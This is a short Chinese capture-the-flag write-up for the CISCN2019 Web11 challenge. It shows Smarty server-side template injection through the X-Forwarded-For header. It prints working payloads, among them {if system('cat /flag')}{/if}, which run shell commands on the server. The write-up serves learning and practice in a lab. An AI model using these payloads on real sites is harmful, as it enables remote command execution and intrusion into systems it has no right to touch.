[CISCN2019 华东南赛区]Web11

进来先做信息收集，右上角显示当前ip，然后有api的调用地址和请求包的格式以及最重要的是最下面的smarty模版，一看到这个就得想到smarty模版注入

测试了一下两个api都无法访问

直接切到数据包看看能不能通过XFF来修改右上角ip

成功修改！

结合给的信息smarty模版来看这道题应该是在XFF这里进行模版注入

漏洞确认(查看smarty的版本号)：

{$smarty.version}

常规利用方式：（使用{php}{/php}标签来执行被包裹其中的php指令，smarty3弃用）

{php}{/php}

执行php指令，php7无法使用

<script language="php">phpinfo();</script>

既是smarty3又是php7，这两种方法都不能用了

换一种利用方式

if标签执行PHP命令）

{if phpinfo()}{/if}

{if system('ls')}{/if}

{if system('cat /flag')}{/if}

构造payload：{if system('ls /')}{/if}

根下发现flag

构造payload：{if system('cat /flag')}{/if}

拿下flag！